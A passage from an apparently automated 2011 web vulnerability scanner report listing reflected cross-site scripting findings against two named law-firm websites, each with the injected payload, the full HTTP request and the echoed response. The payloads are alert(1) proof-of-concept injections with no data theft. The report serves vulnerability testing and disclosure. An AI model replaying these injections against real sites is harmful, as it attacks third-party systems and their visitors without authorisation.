User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webceaaf"style="x:expression(alert(1))"ff30546ad01/br.nsf/home_btn_05ov.jpg">
...[SNIP]...

4.142. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8aca7"style%3d"x%3aexpression(alert(1))"f20c4010af0 was submitted in the REST URL parameter 4. This input was echoed as 8aca7"style="x:expression(alert(1))"f20c4010af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf8aca7"style%3d"x%3aexpression(alert(1))"f20c4010af0/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf8aca7"style="x:expression(alert(1))"f20c4010af0/home_btn_05ov.jpg">
...[SNIP]...

4.143. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22b2"style%3d"x%3aexpression(alert(1))"06ea3ed31de was submitted in the REST URL parameter 5. This input was echoed as d22b2"style="x:expression(alert(1))"06ea3ed31de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_05ov.jpgd22b2"style%3d"x%3aexpression(alert(1))"06ea3ed31de HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_05ov.jpgd22b2"style="x:expression(alert(1))"06ea3ed31de">
...[SNIP]...

4.144. http://www.hbsr.com/contact_us/index [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bda6"><script>alert(1)</script>8ad033eb3c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us1bda6"><script>alert(1)</script>8ad033eb3c3/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us1bda6"><script>alert(1)</script>8ad033eb3c3/index-print">
...[SNIP]...

4.145. http://www.hbsr.com/contact_us/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b5c"><script>alert(1)</script>c3ef65ee739 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us/indexd3b5c"><script>alert(1)</script>c3ef65ee739 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us/indexd3b5c"><script>alert(1)</script>c3ef65ee739-print">
...[SNIP]...

4.146. http://www.hbsr.com/contact_us/index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /contact_us/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feddf"><script>alert(1)</script>141aece0633 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact_us/index?feddf"><script>alert(1)</script>141aece0633=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/software
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.4.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/contact_us/index?feddf"><script>alert(1)</script>141aece0633=1&amp;printable=yes">
...[SNIP]...

4.147. http://www.hbsr.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd51"><script>alert(1)</script>5aa86bd4b74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoebd51"><script>alert(1)</script>5aa86bd4b74 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:21:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/favicon.icoebd51"><script>alert(1)</script>5aa86bd4b74-print">
...[SNIP]...

4.148. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ee3"><script>alert(1)</script>d9e5dbdc1f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_eventsf4ee3"><script>alert(1)</script>d9e5dbdc1f3/133-congratulations-finalists-invented-here-celebration-new-england HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_eventsf4ee3"><script>alert(1)</script>d9e5dbdc1f3/133-congratulations-finalists-invented-here-celebration-new-england-print">
...[SNIP]...

4.149. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 816d8"><script>alert(1)</script>9a9e300e5c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/133-congratulations-finalists-invented-here-celebration-new-england816d8"><script>alert(1)</script>9a9e300e5c5 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england816d8"><script>alert(1)</script>9a9e300e5c5-print">
...[SNIP]...

4.150. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/133-congratulations-finalists-invented-here-celebration-new-england

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b011"><script>alert(1)</script>c99e597bca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/133-congratulations-finalists-invented-here-celebration-new-england?2b011"><script>alert(1)</script>c99e597bca6=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.6.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:28:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england?2b011"><script>alert(1)</script>c99e597bca6=1&amp;printable=yes">
...[SNIP]...

4.151. http://www.hbsr.com/news_events/index [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee970"><script>alert(1)</script>a8722f44815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_eventsee970"><script>alert(1)</script>a8722f44815/index HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_eventsee970"><script>alert(1)</script>a8722f44815/index-print">
...[SNIP]...

4.152. http://www.hbsr.com/news_events/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c57c0"><script>alert(1)</script>082bddadd32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/indexc57c0"><script>alert(1)</script>082bddadd32 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/indexc57c0"><script>alert(1)</script>082bddadd32-print">
...[SNIP]...

4.153. http://www.hbsr.com/news_events/index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /news_events/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de00f"><script>alert(1)</script>81755691be4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news_events/index?de00f"><script>alert(1)</script>81755691be4=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.5.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/news_events/index?de00f"><script>alert(1)</script>81755691be4=1&amp;printable=yes">
...[SNIP]...

4.154. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/biotechnology

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bf7c"><script>alert(1)</script>b8520e48e4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies8bf7c"><script>alert(1)</script>b8520e48e4b/biotechnology HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies8bf7c"><script>alert(1)</script>b8520e48e4b/biotechnology-print">
...[SNIP]...

4.155. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/biotechnology

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae3f"><script>alert(1)</script>535c552892a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/biotechnology4ae3f"><script>alert(1)</script>535c552892a HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.7.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:28:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/biotechnology4ae3f"><script>alert(1)</script>535c552892a-print">
...[SNIP]...

4.156. http://www.hbsr.com/practices_technologies/biotechnology [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hbsr.com
Path:   /practices_technologies/biotechnology

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 406d7"><script>alert(1)</script>6b5c14438ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

